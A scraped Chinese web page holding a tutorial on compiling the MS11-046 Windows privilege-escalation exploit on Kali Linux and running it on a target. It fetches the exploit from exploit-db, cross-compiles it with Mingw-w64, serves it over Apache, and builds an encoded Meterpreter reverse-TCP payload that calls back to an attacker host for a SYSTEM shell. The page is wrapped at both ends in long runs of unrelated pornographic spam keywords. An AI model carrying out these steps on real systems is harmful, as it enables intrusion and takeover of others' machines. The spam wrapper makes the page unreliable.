婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 在Kali Linux上編譯Windows漏洞的方法

在Kali Linux上編譯Windows漏洞的方法

熱門標簽:巴東單位怎么做地圖標注 地圖標注員項目 外呼系統(tǒng)工作推進 電話外呼系統(tǒng)線路哪家公司做得好 地圖標注用小紅旗 免費高德地圖標注 索契地圖標注app 成都人工外呼系統(tǒng)平臺 儋州電銷機器人廠家

如何在Kali Linux上編譯Windows漏洞!

Mingw-w64是一個用于創(chuàng)建Windows應用程序的自由和開源軟件開發(fā)環(huán)境。 Mingw-w64最初叫Mingw32,它當時不支持64位架構。在本教程中,我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞。 讓我們開始在Kali Linux上安裝Mingw-w64。

Mingw-w64是一個用于創(chuàng)建Windows應用程序的自由和開源軟件開發(fā)環(huán)境。 Mingw-w64最初叫Mingw32,它當時不支持64位架構。

在本教程中,我們將討論如何使用Mingw-64在 Kali Linux上編譯Windows漏洞。 讓我們開始在Kali Linux上安裝Mingw-w64。

1、在Kali Linux上安裝Mingw-w64

默認情況下,Kali Linux 2016.2和更低版本上未安裝Mingw-w64。 因此,我們需要先安裝它,然后才能在Linux上編譯Windows漏洞。 執(zhí)行以下命令,安裝Mingw-w64:

apt-get update  apt-get install mingw-w64    

使用apt-get install mingw-w64在您的Kali主機上安裝mingw-w64。

鍵入y為yes,以確認并繼續(xù)Mingw-w64安裝過程。 下載和安裝Mingw-w64可能需要一段時間才能完成。

2、無法找到程序包mingw-w64的解決方法

有時,你嘗試安裝mingw-w64包時得到一個無法找到包mingw-w64的錯誤,并得到類似如下提示:

root@kali:~# apt-getinstall mingw-w64  Reading package lists…Done  Building dependency tree  Reading stateinformation… Done  E: Unable to locatepackage mingw-w64  

要解決這個問題,請確保在sources.list文件中具有正確的存儲庫。您可以使用nano編輯文件:

/etc/apt/sources.list

確保您在此文件中具有正確的存儲庫。 您可以在以下頁面上找到不同版本的Kali Linux的存儲庫:

http://docs.kali.org/general-use/kali-linux-sources-list-repositories

使用sources.list文件中的正確的存儲庫,您需要運行apt-get update,然后再次運行Mingw-w64軟件包的安裝命令。

3、用Mingw-w64交叉編譯Windows漏洞利用

現(xiàn)在我們已經(jīng)安裝了Mingw-w64,可以開始編譯Windows漏洞利用程序了。 對于本教程,我們將編譯一個用C編寫的Windows漏洞利用程序,以利用Windows 7 SP0 x86中的CVE-2011-1249(MS11-046)漏洞。 此版本的Windows操作系統(tǒng)在輔助功能驅(qū)動程序(AFD)中包含一個漏洞,允許已認證的非管理用戶提升權限。即使Mingw-w64是為非常需要的64位支持開發(fā)的,我們也可以編譯32位Windows漏洞。 讓我們來看看如何編譯32位Windows漏洞。

讓我們從Exploit-db下載漏洞:

wget --output-document= 40564.c https://www.exploit-db.com/download/40564

使用以下命令編譯Windows 32位的afd.sys exploit:

i686-w64-mingw32-gcc[input file: source]–o [output file: .exe]-lws2_32

以下命令將編譯Windows 7 afd.sys特權升級漏洞:

i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32  

編譯Windows漏洞。

要將漏洞利用程序轉移到目標主機,我們將使用內(nèi)置的ApacheWeb服務器來提供它。 最后2個命令會將exploit復制到Apache主目錄并啟動Apache Web服務器。

當我們從cmd.exe下載并執(zhí)行該漏洞時,它將如下所示: 

漏洞利用成功執(zhí)行。

因為我們可以看到whoami命令在執(zhí)行exploit之前返回一個普通用戶權限,之后顯示是system用戶權限。這個exploit實際上在當前shell中生成一個新的shell,而不是在新窗口中創(chuàng)建一個新的shell。這意味著我們也可以從命令行shell運行此漏洞利用程序,例如Meterpreter。讓我們看看如何從Meterpreter會話運行漏洞利用。

4、利用編譯錯誤

當編譯針對不同架構和操作系統(tǒng)的漏洞時,可能會發(fā)生許多錯誤。有很多因素可能導致編譯失敗,例如:語法,庫,主機和目標體系結構,用于編譯代碼的已安裝軟件等等。一些錯誤可能很容易修復,有些錯誤則不是。同樣重要的是不同的警告來自致命的錯誤,因為警告可能只是指示一些類似的過時的功能,不能阻止漏洞的工作。致命錯誤會阻止漏洞利用,因此需要修復。

處理編譯錯誤的最佳方法是仔細閱讀,然后在Google上搜索解決方案。通常你不是第一個也不是唯一面對某個編譯錯誤的人,因此沒有必要重新發(fā)明輪子。在線資源(如堆棧交換)通常為您提供最常見的編譯錯誤的可能解決方案。

5、從Meterpreter shell中利用MS11-046

讓我們使用Msfvenom快速生成Windows 32位Meterpreter反向TCP有效負載,并在目標主機上執(zhí)行它。 我們將在Metasploit中使用多處理程序來捕獲反向shell。

使用以下命令使用Msfvenom創(chuàng)建有效負載:

msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcpLHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe

請務必更換偵聽主機IP,必要時更換偵聽端口。現(xiàn)在啟動msfconsole并運行以下命令來設置多處理器漏洞:

use exploit/multi/handler  set lhost [listening host IP]  set lport 4444  run   

在端口4444上啟動反向TCP處理程序。

然后下載利用程序到目標主機并執(zhí)行它。 如果一切設置正確,您應該在msfconsole上收到一個反向Meterpreter shell: 

目標主機連接回Kali。

在Meterpreter命令行上運行下一“shell”命令并運行特權升級漏洞利用程序?qū)hell升級到系統(tǒng)shell: 

特權升級攻擊通過我們的Meterpreter會話成功執(zhí)行。

正如你可以看到的,shell從特權測試用戶shell變化到系統(tǒng)shell。 請注意,在執(zhí)行它的shell中生成一個新的系統(tǒng)shell。 因此,我們不能看到利用輸出,因為它是在有限的特權的舊shell。

您可以通過鍵入Exit來驗證這一點,將退出系統(tǒng)shell并返回到仍包含Windows 7權限升級exploit輸出的用戶shell: 

特權用戶shell上的exploit輸出。

學到的東西

在本教程中,我們已經(jīng)了解了在Linux上針對Windows的交叉編譯漏洞的基礎知識。 我們已經(jīng)學習了如何在Kali Linux上安裝Mingw-w64并解決最常見的安裝問題。 為了練習漏洞編譯過程,我們編譯了一個針對Windows7 x86的特權提升漏洞。 這也稱為交叉編譯。

我們已成功的在目標主機上執(zhí)行已編譯的可執(zhí)行文件,并將shell從有限的用戶shell升級到系統(tǒng)shell。 我們已經(jīng)知道,這個特殊的exploit在shell中生成了一個shell,在這個shell中執(zhí)行了exploit。 這樣,我們還可以從命令行(例如Meterpreter shell)執(zhí)行特權提升漏洞利用。

最后但同樣重要的是,我們已經(jīng)了解了如何在編譯過程中修復錯誤。

標簽:江蘇 儋州 鄂州 安康 龍巖 鶴壁 茂名 長春

巨人網(wǎng)絡通訊聲明:本文標題《在Kali Linux上編譯Windows漏洞的方法》,本文關鍵詞  在,Kali,Linux,上,編譯,Windows,;如發(fā)現(xiàn)本文內(nèi)容存在版權問題,煩請?zhí)峁┫嚓P信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《在Kali Linux上編譯Windows漏洞的方法》相關的同類信息!
  • 本頁收集關于在Kali Linux上編譯Windows漏洞的方法的相關信息資訊供網(wǎng)民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    69久久夜色精品国产69蝌蚪网| 色婷婷亚洲一区二区三区| 国产黄色精品视频| 91一区二区在线观看| 欧美成人精品二区三区99精品| 国产精品久久久久毛片软件| 日韩va欧美va亚洲va久久| 国产成人免费高清| 日韩视频一区二区三区在线播放 | 国产高清精品久久久久| 91高清视频免费看| 中文字幕av不卡| 美女免费视频一区| 欧美午夜理伦三级在线观看| 久久九九久久九九| 久久国产精品色| 欧美老女人第四色| 亚洲国产日韩av| 色呦呦国产精品| 最新日韩av在线| 成+人+亚洲+综合天堂| 精品国产一区二区三区av性色| 亚洲成av人片在线观看无码| 91在线观看高清| 国产精品美女久久久久久| 高清国产午夜精品久久久久久| 欧美videofree性高清杂交| 偷拍一区二区三区四区| 欧美日韩另类一区| 性做久久久久久久免费看| 欧美曰成人黄网| 亚洲制服丝袜av| 91热门视频在线观看| 亚洲欧美一区二区三区国产精品| 成人一级黄色片| 亚洲欧美怡红院| 成人国产免费视频| 一区在线播放视频| 色婷婷一区二区| 午夜精品在线视频一区| 91精品欧美久久久久久动漫| 婷婷丁香激情综合| 精品第一国产综合精品aⅴ| 国产在线国偷精品产拍免费yy| 久久综合色综合88| 成人免费不卡视频| 亚洲高清在线视频| 日韩视频一区二区| 福利视频网站一区二区三区| 亚洲婷婷综合色高清在线| 色系网站成人免费| 日韩国产欧美在线观看| 久久网站热最新地址| 国产凹凸在线观看一区二区| 自拍偷在线精品自拍偷无码专区 | 欧美色手机在线观看| 亚洲成人在线网站| 精品国产免费人成电影在线观看四季| 国内精品国产三级国产a久久| 欧美激情在线免费观看| 在线视频一区二区三区| 蜜芽一区二区三区| 国产精品色哟哟网站| 欧美色老头old∨ideo| 国产精品一卡二卡在线观看| 亚洲欧洲一区二区在线播放| 在线不卡中文字幕播放| 国产a视频精品免费观看| 一区二区视频在线| 久久一日本道色综合| 在线观看中文字幕不卡| 黑人巨大精品欧美一区| 亚洲已满18点击进入久久| 久久老女人爱爱| 欧美视频一区二区三区在线观看| 精品无码三级在线观看视频| 亚洲精品乱码久久久久久日本蜜臀| 91麻豆精品国产91久久久更新时间| 国产福利一区二区三区在线视频| 亚洲成人自拍偷拍| 国产精品国产三级国产普通话蜜臀| 9191精品国产综合久久久久久| 成人毛片视频在线观看| 日本91福利区| 亚洲中国最大av网站| 国产精品日产欧美久久久久| 日韩欧美国产精品| 欧美亚洲一区三区| 成人福利在线看| 国产一区二区精品久久99| 丝袜亚洲另类欧美综合| 一区二区三区免费网站| 国产精品久久综合| 国产肉丝袜一区二区| 日韩欧美中文字幕公布| 欧美三级日韩在线| 91麻豆自制传媒国产之光| 国产aⅴ精品一区二区三区色成熟| 日本大胆欧美人术艺术动态| 亚洲一区中文日韩| 一区二区三区精品| 亚洲少妇最新在线视频| 国产精品入口麻豆原神| 国产精品三级电影| 国产精品久久久99| 国产精品美女一区二区三区| 国产蜜臀97一区二区三区| 国产亚洲欧美一级| 2023国产一二三区日本精品2022| 在线综合视频播放| 欧美大片拔萝卜| 久久综合久久综合九色| 久久毛片高清国产| 国产精品私人影院| 亚洲视频一区二区免费在线观看| 国产精品欧美久久久久一区二区 | 亚洲一卡二卡三卡四卡无卡久久| 成人免费在线视频观看| 中文字幕在线免费不卡| 亚洲日韩欧美一区二区在线| 亚洲人成网站影音先锋播放| 国产精品久久久久7777按摩| 亚洲蜜臀av乱码久久精品| 亚洲欧美日韩小说| 亚洲午夜影视影院在线观看| 婷婷激情综合网| 国产一区在线精品| 99久久久国产精品免费蜜臀| 在线免费观看成人短视频| 欧美在线短视频| 欧美一区二区福利视频| 久久久美女毛片| 中文字幕一区二区三区精华液| **性色生活片久久毛片| 午夜一区二区三区视频| 日本亚洲电影天堂| 国产精品影视网| 在线免费观看日本欧美| 91精品国产综合久久精品app| 2021久久国产精品不只是精品| 中文欧美字幕免费| 日韩黄色免费电影| 国产精品12区| 欧洲亚洲精品在线| 精品日韩一区二区三区| 中文字幕一区二区三区精华液| 亚洲国产精品一区二区www| 精品午夜久久福利影院| 91色|porny| 精品电影一区二区三区| 亚洲综合一区二区三区| 精品一区二区在线播放| 色哟哟欧美精品| 精品国产乱码久久久久久浪潮| 亚洲人成精品久久久久| 精品一区二区综合| 在线国产电影不卡| 国产欧美日韩在线观看| 日韩av电影免费观看高清完整版| 成人免费av网站| 精品久久人人做人人爽| 亚洲线精品一区二区三区八戒| 狠狠色综合日日| 欧美一级一区二区| 亚洲精品中文字幕在线观看| 国产一区二区三区电影在线观看| 欧美性猛交xxxx乱大交退制版| 久久欧美中文字幕| 午夜精品免费在线| 一道本成人在线| 中文字幕在线不卡| 国产精品一二二区| 日韩午夜av电影| 亚洲自拍与偷拍| 色综合久久久网| 久久精品免视看| 精品制服美女久久| 欧美一区二区在线视频| 亚洲一级片在线观看| 在线中文字幕一区| 亚洲精品伦理在线| 在线这里只有精品| 亚洲激情自拍偷拍| 99久久国产综合色|国产精品| 久久精品人人做人人爽人人| 国产做a爰片久久毛片| 精品捆绑美女sm三区| 日韩av电影天堂| 日韩一区二区视频在线观看| 亚洲已满18点击进入久久| 91久久国产综合久久| 亚洲免费视频中文字幕| 91麻豆自制传媒国产之光| 亚洲精品国产一区二区三区四区在线| 丁香激情综合国产| 国产精品动漫网站| 99久久99久久精品免费观看| 亚洲色图清纯唯美| 欧美性videosxxxxx| 日韩有码一区二区三区|